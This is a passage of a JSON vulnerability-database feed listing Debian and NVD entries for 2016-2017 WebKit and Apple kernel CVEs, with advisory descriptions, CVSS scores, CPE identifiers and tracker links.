"DEBIANCVE:CVE-2017-2367", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T16:34:37", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2454", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2454"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2454", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2454", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2460", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2460"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2460", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2460", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2466", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2466"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2466", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2466", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2481", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2481"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2481", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2481", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2470", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2470"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2470", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2470", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:37", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2386", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2386"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2386", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2386", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2469", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2469"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2469", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2469", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:37", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2459", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2459"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2459", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2459", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:37", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via crafted frame objects.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2445", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2445"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2445", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2445", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2465", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2465"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2465", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2465", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:37", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2455", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2455"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2455", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2455", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2464", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2464"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2464", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2464", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T16:36:12", "description": "JavaScriptCore in WebKit allows attackers to cause a denial of service (out-of-bounds heap read) via a crafted Javascript file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-02-03T15:59:00", "type": "cve", "title": "CVE-2016-9642", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9642"], "modified": "2017-07-12T01:29:00", "cpe": ["cpe:/a:webkit:webkit:-"], "id": "CVE-2016-9642", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9642", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:webkit:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T16:36:17", "description": "The regex code in Webkit 2.4.11 allows remote attackers to cause a denial of service (memory consumption) as demonstrated in a large number of ($ (open parenthesis and dollar) followed by {-2,16} and a large number of +) (plus close parenthesis).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-03-07T16:59:00", "type": "cve", "title": "CVE-2016-9643", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9643"], "modified": "2017-07-12T01:29:00", "cpe": ["cpe:/a:webkit:webkit:2.4.11"], "id": "CVE-2016-9643", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9643", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:webkit:webkit:2.4.11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:46:17", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2396", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2396"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2396", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2396", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:46:15", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2395", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2395"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2395", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2395", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:50:33", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Kernel\" component. An off-by-one error allows attackers to execute arbitrary code in a privileged context via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2474", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2474"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2474", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2474", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:52:05", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is 